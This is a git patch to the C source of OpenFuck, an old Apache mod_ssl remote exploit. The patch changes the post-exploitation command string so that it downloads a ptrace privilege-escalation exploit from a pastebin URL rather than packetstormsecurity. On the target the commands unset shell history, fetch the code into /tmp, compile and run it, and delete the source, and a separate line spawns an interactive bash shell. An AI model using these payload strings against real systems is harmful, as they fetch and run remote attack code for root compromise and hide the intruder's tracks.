From d77a8664ffcc7d62c385f94de6f0f51cf32aec47 Mon Sep 17 00:00:00 2001 From: AgentWhite <53082621+realagentwhite@users.noreply.github.com> Date: Fri, 8 May 2020 11:26:00 -0400 Subject: [PATCH] Update the link It is copied to a pastebin since it is unable to be downloaded from packetstormsecurity --- OpenFuck.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/OpenFuck.c b/OpenFuck.c index cce9e0d..9ba9eeb 100644 --- a/OpenFuck.c +++ b/OpenFuck.c @@ -668,7 +668,9 @@ typedef struct { } ssl_conn; #define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n" -#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" +// #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" + +#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://pastebin.com/raw/C7v25Xr9 -O ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" long getip(char *hostname) { struct hostent *he; @@ -1304,4 +1306,4 @@ int main(int argc, char* argv[]) } /* spabam: It isn't 0day */ -// milw0rm.com [2003-04-04] \ No newline at end of file +// milw0rm.com [2003-04-04]